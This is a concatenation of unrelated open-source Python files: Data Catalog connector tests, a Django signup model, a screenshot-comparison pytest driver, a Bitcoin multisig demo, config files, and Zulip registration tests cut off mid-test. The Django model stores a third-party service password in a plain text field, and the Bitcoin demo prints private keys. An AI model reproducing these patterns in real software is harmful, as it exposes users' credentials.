tag_templates_dict = {'sisense_folder_metadata': tag_template}
fake_entry = ('test-folder', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_folder.return_value = fake_entry
fake_tag = datacatalog.Tag()
fake_tag.template = 'tagTemplates/sisense_folder_metadata'
tag_factory = self.__mock_tag_factory
tag_factory.make_tag_for_folder.return_value = fake_tag
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_folder(
folder, tag_templates_dict)
self.assertEqual('test-folder', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_folder.assert_called_once_with(folder)
tags = assembled_entry.tags
self.assertEqual(1, len(tags))
self.assertEqual('tagTemplates/sisense_folder_metadata',
tags[0].template)
tag_factory.make_tag_for_folder.assert_called_once_with(
tag_template, folder)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_dashboard(
self, mock_make_assembled_entry_for_dashboard):
dashboard = self.__make_fake_dashboard()
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(1, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_widget')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_nested_widgets( # noqa: E501
self, mock_make_assembled_entry_for_dashboard,
mock_make_assembled_entry_for_widget):
widget = self.__make_fake_widget()
dashboard = self.__make_fake_dashboard()
dashboard['widgets'] = [widget]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
mock_make_assembled_entry_for_widget.assert_called_once_with(
widget, tag_templates_dict)
def test_make_assembled_entry_for_dashboard_should_make_entry_and_tags(
self):
dashboard = self.__make_fake_dashboard()
dashboard_tag_template = datacatalog.TagTemplate()
dashboard_tag_template.name = 'tagTemplates/sisense_dashboard_metadata'
jaql_tag_template = datacatalog.TagTemplate()
jaql_tag_template.name = 'tagTemplates/sisense_jaql_metadata'
tag_templates_dict = {
'sisense_dashboard_metadata': dashboard_tag_template,
'sisense_jaql_metadata': jaql_tag_template
}
fake_entry = ('test-dashboard', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_dashboard.return_value = fake_entry
tag_factory = self.__mock_tag_factory
fake_dashboard_tag = datacatalog.Tag()
fake_dashboard_tag.template = 'tagTemplates/sisense_dashboard_metadata'
tag_factory.make_tag_for_dashboard.return_value = fake_dashboard_tag
fake_filter_tag = datacatalog.Tag()
fake_filter_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_dashboard_filters.return_value = [
fake_filter_tag
]
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual('test-dashboard', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_dashboard.assert_called_once_with(
dashboard)
tags = assembled_entry.tags
self.assertEqual(2, len(tags))
self.assertEqual('tagTemplates/sisense_dashboard_metadata',
tags[0].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[1].template)
tag_factory.make_tag_for_dashboard.assert_called_once_with(
dashboard_tag_template, dashboard)
tag_factory.make_tags_for_dashboard_filters.assert_called_once_with(
jaql_tag_template, dashboard)
def test_make_assembled_entry_for_widget_should_make_entry_and_tags(self):
widget = self.__make_fake_widget()
widget_tag_template = datacatalog.TagTemplate()
widget_tag_template.name = 'tagTemplates/sisense_widget_metadata'
jaql_tag_template = datacatalog.TagTemplate()
jaql_tag_template.name = 'tagTemplates/sisense_jaql_metadata'
tag_templates_dict = {
'sisense_widget_metadata': widget_tag_template,
'sisense_jaql_metadata': jaql_tag_template
}
fake_entry = ('test-widget', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_widget.return_value = fake_entry
tag_factory = self.__mock_tag_factory
fake_widget_tag = datacatalog.Tag()
fake_widget_tag.template = 'tagTemplates/sisense_widget_metadata'
tag_factory.make_tag_for_widget.return_value = fake_widget_tag
fake_field_tag = datacatalog.Tag()
fake_field_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_widget_fields.return_value = [fake_field_tag]
fake_filter_tag = datacatalog.Tag()
fake_filter_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_widget_filters.return_value = [
fake_filter_tag
]
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_widget(
widget, tag_templates_dict)
self.assertEqual('test-widget', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_widget.assert_called_once_with(widget)
tags = assembled_entry.tags
self.assertEqual(3, len(tags))
self.assertEqual('tagTemplates/sisense_widget_metadata',
tags[0].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[1].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[2].template)
tag_factory.make_tag_for_widget.assert_called_once_with(
widget_tag_template, widget)
tag_factory.make_tags_for_widget_fields.assert_called_once_with(
jaql_tag_template, widget)
tag_factory.make_tags_for_widget_filters.assert_called_once_with(
jaql_tag_template, widget)
@classmethod
def __make_fake_folder(cls) -> Dict[str, Any]:
return {
'oid': 'test-folder',
'type': 'folder',
'name': 'Test folder',
}
@classmethod
def __make_fake_dashboard(cls) -> Dict[str, Any]:
return {
'oid': 'test-dashboard',
'type': 'dashboard',
'title': 'Test dashboard',
}
@classmethod
def __make_fake_widget(cls) -> Dict[str, Any]:
return {
'oid': 'test-widget',
'type': 'indicator',
'title': 'Test widget',
}
| GoogleCloudPlatform/datacatalog-connectors-bi | google-datacatalog-sisense-connector/tests/google/datacatalog_connectors/sisense/prepare/assembled_entry_factory_test.py | Python | apache-2.0 | 13,804 | 0 |
from django import forms
from django.contrib.auth.models import User
from django.forms import ModelForm
from django.db import models
# Create your models here.
# EDITING THE USER MODEL
User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False))
User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False))
#User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, blank=True))
# FORMS
class SignUpForm(ModelForm):
class Meta:
model = User
fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico']
widgets = {
'password': forms.PasswordInput(),
'contrasenia_sico': forms.PasswordInput(),
}
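# Note (assumption about usage): User.add_to_class() attaches the new columns
# to the stock django.contrib.auth User model at import time; a matching
# schema migration is still required before the fields can be stored.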
| Titulacion-Sistemas/PracticasDjango | usuarios_logueados/usuarios/models.py | Python | gpl-2.0 | 791 | 0.011378 |
"""pytest_needle.driver
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
import base64
from errno import EEXIST
import math
import os
import re
import sys
import pytest
from needle.cases import import_from_string
from needle.engines.pil_engine import ImageDiff
from PIL import Image, ImageDraw, ImageColor
from selenium.webdriver.remote.webdriver import WebElement
from pytest_needle.exceptions import ImageMismatchException, MissingBaselineException, MissingEngineException
if sys.version_info >= (3, 0):
from io import BytesIO as IOClass
    # Ignoring since basestring is not redefined if running on python3
basestring = str # pylint: disable=W0622,C0103
else:
try:
from cStringIO import StringIO as IOClass
except ImportError:
from StringIO import StringIO as IOClass
DEFAULT_BASELINE_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots', 'baseline'))
DEFAULT_OUTPUT_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots'))
DEFAULT_ENGINE = 'needle.engines.pil_engine.Engine'
DEFAULT_VIEWPORT_SIZE = '1024x768'
class NeedleDriver(object): # pylint: disable=R0205
"""NeedleDriver instance
"""
ENGINES = {
'pil': DEFAULT_ENGINE,
'imagemagick': 'needle.engines.imagemagick_engine.Engine',
'perceptualdiff': 'needle.engines.perceptualdiff_engine.Engine'
}
def __init__(self, driver, **kwargs):
self.options = kwargs
self.driver = driver
# Set viewport position, size
self.driver.set_window_position(0, 0)
self.set_viewport()
@staticmethod
def _create_dir(directory):
"""Recursively create a directory
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L125
:param str directory: Directory path to create
:return:
"""
try:
os.makedirs(directory)
except OSError as err:
if err.errno == EEXIST and os.path.isdir(directory):
return
raise err
def _find_element(self, element_or_selector=None):
"""Returns an element
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:return:
"""
if isinstance(element_or_selector, tuple): # pylint: disable=R1705
elements = self.driver.find_elements(*element_or_selector)
return elements[0] if elements else None
elif isinstance(element_or_selector, WebElement):
return element_or_selector
raise ValueError("element_or_selector must be a WebElement or tuple selector")
@staticmethod
def _get_element_dimensions(element):
"""Returns an element's position and size
:param WebElement element: Element to get dimensions for
:return:
"""
if isinstance(element, WebElement):
# Get dimensions of element
location = element.location
size = element.size
return {
'top': int(location['y']),
'left': int(location['x']),
'width': int(size['width']),
'height': int(size['height'])
}
raise ValueError("element must be a WebElement")
def _get_element_rect(self, element):
"""Returns the two points that define the rectangle
:param WebElement element: Element to get points for
:return:
"""
dimensions = self._get_element_dimensions(element)
if dimensions:
return (
dimensions['left'],
dimensions['top'],
(dimensions['left'] + dimensions['width']),
(dimensions['top'] + dimensions['height'])
)
return ()
@staticmethod
def _get_ratio(image_size, window_size):
return max((
math.ceil(image_size[0] / float(window_size[0])),
math.ceil(image_size[1] / float(window_size[1]))
))
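    # Note: the ratio above compensates for high-DPI rendering, where the
    # screenshot bitmap may be larger than the CSS-pixel window size
    # (e.g. a 2x device pixel ratio on Retina displays).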
def _get_window_size(self):
window_size = self.driver.get_window_size()
return window_size['width'], window_size['height']
@property
def baseline_dir(self):
"""Return baseline image path
:return:
:rtype: str
"""
return self.options.get('baseline_dir', DEFAULT_BASELINE_DIR)
@baseline_dir.setter
def baseline_dir(self, value):
"""Set baseline image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['baseline_dir'] = value
@property
def cleanup_on_success(self):
"""Returns True, if cleanup on success flag is set
:return:
:rtype: bool
"""
return self.options.get('cleanup_on_success', False)
@cleanup_on_success.setter
def cleanup_on_success(self, value):
"""Set cleanup on success flag
:param bool value: Cleanup on success flag
:return:
"""
self.options['cleanup_on_success'] = bool(value)
@property
def engine(self):
"""Return image processing engine
:return:
"""
return import_from_string(self.engine_class)()
@property
def engine_class(self):
"""Return image processing engine name
:return:
:rtype: str
"""
return self.ENGINES.get(self.options.get('needle_engine', 'pil').lower(), DEFAULT_ENGINE)
@engine_class.setter
def engine_class(self, value):
"""Set image processing engine name
:param str value: Image processing engine name (pil, imagemagick, perceptualdiff)
:return:
"""
assert value.lower() in self.ENGINES
self.options['needle_engine'] = value.lower()
def get_screenshot(self, element=None):
"""Returns screenshot image
:param WebElement element: Crop image to element (Optional)
:return:
"""
stream = IOClass(base64.b64decode(self.driver.get_screenshot_as_base64().encode('ascii')))
image = Image.open(stream).convert('RGB')
if isinstance(element, WebElement):
window_size = self._get_window_size()
image_size = image.size
# Get dimensions of element
dimensions = self._get_element_dimensions(element)
if not image_size == (dimensions['width'], dimensions['height']):
ratio = self._get_ratio(image_size, window_size)
return image.crop([point * ratio for point in self._get_element_rect(element)])
return image
    def get_screenshot_as_image(self, element=None, exclude=None):
        """Return the current screenshot, optionally cropped to an element
        and with excluded areas masked out
        :param WebElement element: Crop image to element (Optional)
        :param list exclude: Elements to exclude
        :return:
        """
image = self.get_screenshot(element)
# Mask elements in exclude if element is not included
if isinstance(exclude, (list, tuple)) and exclude and not element:
# Gather all elements to exclude
elements = [self._find_element(element) for element in exclude]
elements = [element for element in elements if element]
canvas = ImageDraw.Draw(image)
window_size = self._get_window_size()
image_size = image.size
ratio = self._get_ratio(image_size, window_size)
for ele in elements:
canvas.rectangle([point * ratio for point in self._get_element_rect(ele)],
fill=ImageColor.getrgb('black'))
del canvas
return image
def assert_screenshot(self, file_path, element_or_selector=None, threshold=0, exclude=None):
"""Fail if new fresh image is too dissimilar from the baseline image
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L161
:param str file_path: File name for baseline image
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:param threshold: Distance threshold
:param list exclude: Elements or element selectors for areas to exclude
:return:
"""
element = self._find_element(element_or_selector) if element_or_selector else None
# Get baseline screenshot
self._create_dir(self.baseline_dir)
baseline_image = os.path.join(self.baseline_dir, '%s.png' % file_path) \
if isinstance(file_path, basestring) else Image.open(file_path).convert('RGB')
# Take screenshot and exit if in baseline saving mode
if self.save_baseline:
self.get_screenshot_as_image(element, exclude=exclude).save(baseline_image)
return
# Get fresh screenshot
self._create_dir(self.output_dir)
fresh_image = self.get_screenshot_as_image(element, exclude=exclude)
fresh_image_file = os.path.join(self.output_dir, '%s.png' % file_path)
fresh_image.save(fresh_image_file)
# Error if there is not a baseline image to compare
if not self.save_baseline and not isinstance(file_path, basestring) and not os.path.exists(baseline_image):
raise IOError('The baseline screenshot %s does not exist. You might want to '
're-run this test in baseline-saving mode.' % baseline_image)
# Compare images
if isinstance(baseline_image, basestring):
try:
self.engine.assertSameFiles(fresh_image_file, baseline_image, threshold)
except AssertionError as err:
msg = getattr(err, 'message', err.args[0] if err.args else "")
args = err.args[1:] if len(err.args) > 1 else []
raise ImageMismatchException(msg, baseline_image, fresh_image_file, args)
except EnvironmentError:
msg = "Missing baseline '{}'. Please run again with --needle-save-baseline".format(baseline_image)
raise MissingBaselineException(msg)
except ValueError as err:
if self.options['needle_engine'] == 'imagemagick':
msg = "It appears {0} is not installed. Please verify {0} is installed or choose a different engine"
raise MissingEngineException(msg.format(self.options['needle_engine']))
raise err
finally:
if self.cleanup_on_success:
os.remove(fresh_image_file)
else:
diff = ImageDiff(fresh_image, baseline_image)
distance = abs(diff.get_distance())
if distance > threshold:
pytest.fail('Fail: New screenshot did not match the baseline (by a distance of %.2f)' % distance)
@property
def output_dir(self):
"""Return output image path
:return:
:rtype: str
"""
return self.options.get('output_dir', DEFAULT_OUTPUT_DIR)
@output_dir.setter
def output_dir(self, value):
"""Set output image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['output_dir'] = value
@property
def save_baseline(self):
"""Returns True, if save baseline flag is set
:return:
:rtype: bool
"""
return self.options.get('save_baseline', False)
@save_baseline.setter
def save_baseline(self, value):
"""Set save baseline flag
:param bool value: Save baseline flag
:return:
"""
self.options['save_baseline'] = bool(value)
def set_viewport(self):
"""Set viewport width, height based off viewport size
:return:
"""
if self.viewport_size.lower() == 'fullscreen':
self.driver.maximize_window()
return
viewport_size = re.match(r'(?P<width>\d+)\s?[xX]\s?(?P<height>\d+)', self.viewport_size)
viewport_dimensions = (viewport_size.group('width'), viewport_size.group('height')) if viewport_size \
else DEFAULT_VIEWPORT_SIZE.split('x')
self.driver.set_window_size(*[int(dimension) for dimension in viewport_dimensions])
@property
def viewport_size(self):
"""Return setting for browser window size
:return:
:rtype: str
"""
return self.options.get('viewport_size', DEFAULT_VIEWPORT_SIZE)
@viewport_size.setter
def viewport_size(self, value):
"""Set setting for browser window size
:param value: Browser window size, as string or (x,y)
:return:
"""
assert isinstance(value, (basestring, list, tuple))
assert len(value) == 2 and all([isinstance(i, int) for i in value]) \
if isinstance(value, (list, tuple)) else True
self.options['viewport_size'] = value if isinstance(value, basestring) else '{}x{}'.format(*value)
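# Minimal usage sketch (illustrative; the baseline name and selector are
# assumptions, not part of this module):
#   from selenium import webdriver
#   needle = NeedleDriver(webdriver.Chrome(), viewport_size='1280x800')
#   needle.assert_screenshot('homepage', ('id', 'main'), threshold=50)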
| jlane9/pytest-needle | pytest_needle/driver.py | Python | mit | 13,087 | 0.00214 |
#!/usr/bin/env python
'''
Title - Create multi-signature address
'''
# Import bitcoin
from bitcoin import *
my_private_key1 = random_key()
my_private_key2 = random_key()
my_private_key3 = random_key()
print("Private Key1: %s\n" % my_private_key1)
print("Private Key2: %s\n" % my_private_key2)
print("Private Key3: %s\n" % my_private_key3)
print('\n')
# Generate Public Key:
my_public_key1 = privtopub(my_private_key1)
my_public_key2 = privtopub(my_private_key2)
my_public_key3 = privtopub(my_private_key3)
print("Public Key1: %s\n" % my_public_key1)
print("Public Key2: %s\n" % my_public_key2)
print("Public Key3: %s\n" % my_public_key3)
print('\n')
# Create Multi-Sig Address:
my_multi_sig = mk_multisig_script(my_public_key1, my_public_key2, my_public_key3, 2, 3)
my_multisig_address = scriptaddr(my_multi_sig)
print("Multi Signature Address %s\n" % my_multisig_address)
| codevan/codevan | BitcoinPlay/multisig_address.py | Python | apache-2.0 | 911 | 0.004391 |
"""
@Author: Kiran Gurajala & Alex Lee
@Project: Project Automail
@Version: 1.0
"""
# Required imports
import struct
# Utils
def pack(fmt, *args):
return struct.pack('<' + fmt, *args)
def unpack(fmt, *args):
return struct.unpack('<' + fmt, *args)
def multichr(values):
return ''.join(map(chr, values))
def multiord(values):
return map(ord, values)
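# Illustrative examples: the '<' prefix forces little-endian byte order, so
#   pack('H', 0x1234)        -> '\x34\x12'
#   unpack('H', '\x34\x12')  -> (0x1234,)
#   multichr([72, 105])      -> 'Hi'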
| ThermoNuclearPanda/Project_Automail | Python Files/utilities.py | Python | mit | 358 | 0.022346 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""JabberHooky"""
__name__ = "jabberhooky"
__author__ = 'Shane R. Spencer'
__email__ = "shane@bogomip.com"
__license__ = 'MIT'
__copyright__ = '2012 Shane R. Spencer'
__version__ = '0.0.1'
__status__ = "Prototype"
| whardier/jabberhooky | jabberhooky/__init__.py | Python | mit | 263 | 0.003802 |
import sys, os
import vecrec
## General
project = u'vecrec'
copyright = u'2015, Kale Kundert'
version = vecrec.__version__
release = vecrec.__version__
master_doc = 'index'
source_suffix = '.rst'
templates_path = ['templates']
exclude_patterns = ['build']
default_role = 'any'
pygments_style = 'sphinx'
## Extensions
extensions = [
'autoclasstoc',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx_rtd_theme',
]
intersphinx_mapping = {
'pyglet': ('http://pyglet.readthedocs.io/en/latest', None),
'pygame': ('https://www.pygame.org/docs', None),
}
autosummary_generate = True
autodoc_default_options = {
'exclude-members': '__dict__,__weakref__,__module__',
}
html_theme = "sphinx_rtd_theme"
#html_static_path = ['static']
| kxgames/vecrec | docs/conf.py | Python | mit | 857 | 0.007001 |
import datetime
import re
import time
import urllib
from typing import Any, Dict, List, Optional, Sequence
from unittest.mock import MagicMock, patch
from urllib.parse import urlencode
import orjson
from django.conf import settings
from django.contrib.auth.views import PasswordResetConfirmView
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import Client, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from corporate.lib.stripe import get_latest_seat_count
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
change_user_is_active,
do_add_default_stream,
do_change_full_name,
do_change_realm_subdomain,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import (
EmailNotDeliveredException,
FromAddress,
deliver_scheduled_emails,
send_future_email,
)
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
cache_tries_captured,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
message_stream_count,
most_recent_message,
most_recent_usermessage,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
RealmAuditLog,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproject.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_data(self) -> None:
realm = get_realm("zulip")
user_profile = self.example_user("hamlet")
name = user_profile.full_name
email = user_profile.delivery_email
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{"full_name": name, "email": email, "subdomain": realm.subdomain, "is_signup": False},
)
data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key="key")
response = redirect_and_log_into_subdomain(
ExternalAuthResult(user_profile=user_profile, data_dict=data_dict)
)
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": name,
"email": email,
"subdomain": realm.subdomain,
# the email has an account at the subdomain,
                # so is_signup gets overridden to False:
"is_signup": False,
"multiuse_object_key": "key",
},
)
data_dict = ExternalAuthDataDict(
email=self.nonreg_email("alice"),
full_name="Alice",
subdomain=realm.subdomain,
is_signup=True,
full_name_validated=True,
multiuse_object_key="key",
)
response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": "Alice",
"email": self.nonreg_email("alice"),
"full_name_validated": True,
"subdomain": realm.subdomain,
"is_signup": True,
"multiuse_object_key": "key",
},
)
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn("deactivated", result.url)
def test_redirection_for_active_realm(self) -> None:
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self) -> None:
result = self.client_get("/accounts/deactivated/")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result.url)
def test_deactivation_notice_when_deactivated(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get("/accounts/deactivated/")
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
self.assertNotIn("It has moved to", result.content.decode())
def test_deactivation_notice_when_deactivated_and_deactivated_redirect_is_set(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.deactivated_redirect = "http://example.zulipchat.com"
realm.save(update_fields=["deactivated", "deactivated_redirect"])
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://example.zulipchat.com">http://example.zulipchat.com</a>.',
result.content.decode(),
)
def test_deactivation_notice_when_realm_subdomain_is_changed(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-subdomain-name", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-subdomain-name.testserver">http://new-subdomain-name.testserver</a>.',
result.content.decode(),
)
def test_deactivated_redirect_field_of_placeholder_realms_are_modified_on_changing_subdomain_multiple_times(
self,
) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name-1", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-1.testserver">http://new-name-1.testserver</a>.',
result.content.decode(),
)
realm = get_realm("new-name-1")
do_change_realm_subdomain(realm, "new-name-2", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-2.testserver">http://new-name-2.testserver</a>.',
result.content.decode(),
)
class AddNewUserHistoryTest(ZulipTestCase):
def test_add_new_user_history_race(self) -> None:
"""Sends a message during user creation"""
# Create a user who hasn't had historical messages added
realm = get_realm("zulip")
stream = Stream.objects.get(realm=realm, name="Denmark")
DefaultStream.objects.create(stream=stream, realm=realm)
        # Make sure Denmark is a default stream and has at least 3 messages.
message_id = self.send_stream_message(self.example_user("hamlet"), stream.name, "test 1")
self.send_stream_message(self.example_user("hamlet"), stream.name, "test 2")
self.send_stream_message(self.example_user("hamlet"), stream.name, "test 3")
with patch("zerver.lib.actions.add_new_user_history"):
self.register(self.nonreg_email("test"), "test")
user_profile = self.nonreg_user("test")
subs = Subscription.objects.select_related("recipient").filter(
user_profile=user_profile, recipient__type=Recipient.STREAM
)
streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])
        # Send a message afterwards to trigger a race between message
# sending and `add_new_user_history`.
race_message_id = self.send_stream_message(
self.example_user("hamlet"), streams[0].name, "test"
)
        # Override ONBOARDING_UNREAD_MESSAGES to 2
ONBOARDING_UNREAD_MESSAGES = 2
with patch("zerver.lib.actions.ONBOARDING_UNREAD_MESSAGES", ONBOARDING_UNREAD_MESSAGES):
add_new_user_history(user_profile, streams)
# Our first message is in the user's history
self.assertTrue(
UserMessage.objects.filter(user_profile=user_profile, message_id=message_id).exists()
)
# The race message is in the user's history and marked unread.
self.assertTrue(
UserMessage.objects.filter(
user_profile=user_profile, message_id=race_message_id
).exists()
)
self.assertFalse(
UserMessage.objects.get(
user_profile=user_profile, message_id=race_message_id
).flags.read.is_set
)
# Verify that the ONBOARDING_UNREAD_MESSAGES latest messages
# that weren't the race message are marked as unread.
latest_messages = (
UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
)
.exclude(message_id=race_message_id)
.order_by("-message_id")[0:ONBOARDING_UNREAD_MESSAGES]
)
self.assert_length(latest_messages, 2)
for msg in latest_messages:
self.assertFalse(msg.flags.read.is_set)
# Verify that older messages are correctly marked as read.
older_messages = (
UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
)
.exclude(message_id=race_message_id)
.order_by("-message_id")[ONBOARDING_UNREAD_MESSAGES : ONBOARDING_UNREAD_MESSAGES + 1]
)
self.assertGreater(len(older_messages), 0)
for msg in older_messages:
self.assertTrue(msg.flags.read.is_set)
def test_auto_subbed_to_personals(self) -> None:
"""
        Newly created users are automatically set up to receive
        personal messages.
"""
test_email = self.nonreg_email("test")
self.register(test_email, "test")
user_profile = self.nonreg_user("test")
old_messages_count = message_stream_count(user_profile)
self.send_personal_message(user_profile, user_profile)
new_messages_count = message_stream_count(user_profile)
self.assertEqual(new_messages_count, old_messages_count + 1)
recipient = Recipient.objects.get(type_id=user_profile.id, type=Recipient.PERSONAL)
message = most_recent_message(user_profile)
self.assertEqual(message.recipient, recipient)
with patch("zerver.models.get_display_recipient", return_value="recip"):
self.assertEqual(
str(message),
"<Message: recip / / "
"<UserProfile: {} {}>>".format(user_profile.email, user_profile.realm),
)
user_message = most_recent_usermessage(user_profile)
self.assertEqual(
str(user_message),
f"<UserMessage: recip / {user_profile.email} ([])>",
)
class InitialPasswordTest(ZulipTestCase):
def test_none_initial_password_salt(self) -> None:
with self.settings(INITIAL_PASSWORD_SALT=None):
self.assertIsNone(initial_password("test@test.com"))
class PasswordResetTest(ZulipTestCase):
"""
Log in, reset password, log out, log in with new password.
"""
def get_reset_mail_body(self, subdomain: str = "zulip") -> str:
from django.core.mail import outbox
[message] = outbox
self.assertEqual(self.email_envelope_from(message), settings.NOREPLY_EMAIL_ADDRESS)
self.assertRegex(
self.email_display_from(message),
fr"^Zulip Account Security <{self.TOKENIZED_NOREPLY_REGEX}>\Z",
)
self.assertIn(f"{subdomain}.testserver", message.extra_headers["List-Id"])
return message.body
def test_password_reset(self) -> None:
user = self.example_user("hamlet")
email = user.delivery_email
old_password = initial_password(email)
assert old_password is not None
self.login_user(user)
# test password reset template
result = self.client_get("/accounts/password/reset/")
self.assert_in_response("Reset your password", result)
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("reset your password", body)
# Visit the password reset link.
password_reset_url = self.get_confirmation_url_from_outbox(
email, url_pattern=settings.EXTERNAL_HOST + r"(\S\S+)"
)
result = self.client_get(password_reset_url)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.endswith(f"/{PasswordResetConfirmView.reset_url_token}/"))
final_reset_url = result.url
result = self.client_get(final_reset_url)
self.assertEqual(result.status_code, 200)
# Reset your password
with self.settings(PASSWORD_MIN_LENGTH=3, PASSWORD_MIN_GUESSES=1000):
# Verify weak passwords don't work.
